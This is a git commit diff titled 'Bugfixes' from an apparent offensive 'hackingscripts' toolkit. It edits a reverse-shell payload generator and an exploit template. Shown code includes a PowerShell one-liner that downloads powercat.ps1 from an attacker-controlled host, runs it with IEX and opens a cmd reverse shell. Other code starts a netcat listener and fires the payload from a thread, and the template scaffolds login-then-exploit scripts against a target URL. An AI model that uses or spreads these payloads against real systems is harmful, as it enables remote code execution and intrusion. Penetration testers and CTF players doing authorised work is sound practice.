Bugfixes
This commit is contained in:
parent
29d5f63c58
commit
1891efe2e4
@ -4,6 +4,8 @@ import socket
|
|||||||
import sys
|
import sys
|
||||||
import pty
|
import pty
|
||||||
import util
|
import util
|
||||||
|
import time
|
||||||
|
import threading
|
||||||
|
|
||||||
def generatePayload(type, local_address, port):
|
def generatePayload(type, local_address, port):
|
||||||
|
|
||||||
@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
|
|||||||
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
|
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
|
||||||
|
|
||||||
def triggerShell(func, port):
|
def triggerShell(func, port):
|
||||||
|
def _wait_and_exec():
|
||||||
|
time.sleep(1.5)
|
||||||
func()
|
func()
|
||||||
|
|
||||||
|
threading.Thread(target=_wait_and_exec).start()
|
||||||
pty.spawn(["nc", "-lvvp", str(port)])
|
pty.spawn(["nc", "-lvvp", str(port)])
|
||||||
|
|
||||||
|
|
||||||
|
15
template.py
15
template.py
@ -5,21 +5,23 @@ import sys
|
|||||||
def generateTemplate(baseUrl):
|
def generateTemplate(baseUrl):
|
||||||
template = """#!/usr/bin/env python
|
template = """#!/usr/bin/env python
|
||||||
|
|
||||||
import requests
|
import sys
|
||||||
import base64
|
|
||||||
import json
|
import json
|
||||||
|
import base64
|
||||||
|
import requests
|
||||||
from bs4 import BeautifulSoup
|
from bs4 import BeautifulSoup
|
||||||
from hackingscripts import util, fileserver
|
from hackingscripts import util, fileserver
|
||||||
|
|
||||||
from urllib3.exceptions import InsecureRequestWarning
|
from urllib3.exceptions import InsecureRequestWarning
|
||||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||||
|
|
||||||
BASE_URL = "%s"
|
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
|
||||||
|
|
||||||
def login(username, password):
|
def login(username, password):
|
||||||
# Template method to create a session
|
# Template method to create a session
|
||||||
session = requests.Session()
|
session = requests.Session()
|
||||||
post_data = { "username": username, "password": password }
|
post_data = { "username": username, "password": password }
|
||||||
res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
|
res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
|
||||||
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
|
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
|
||||||
print("Login failed")
|
print("Login failed")
|
||||||
exit()
|
exit()
|
||||||
@ -29,8 +31,9 @@ def exploit(session, payload):
|
|||||||
# Template method to exploit an endpoint
|
# Template method to exploit an endpoint
|
||||||
pass
|
pass
|
||||||
|
|
||||||
session = login()
|
if __name__ == "__main__":
|
||||||
exploit(session, "id")
|
session = login()
|
||||||
|
exploit(session, "id")
|
||||||
""" % baseUrl
|
""" % baseUrl
|
||||||
|
|
||||||
return template
|
return template
|
||||||
|
Loading…
Reference in New Issue
Block a user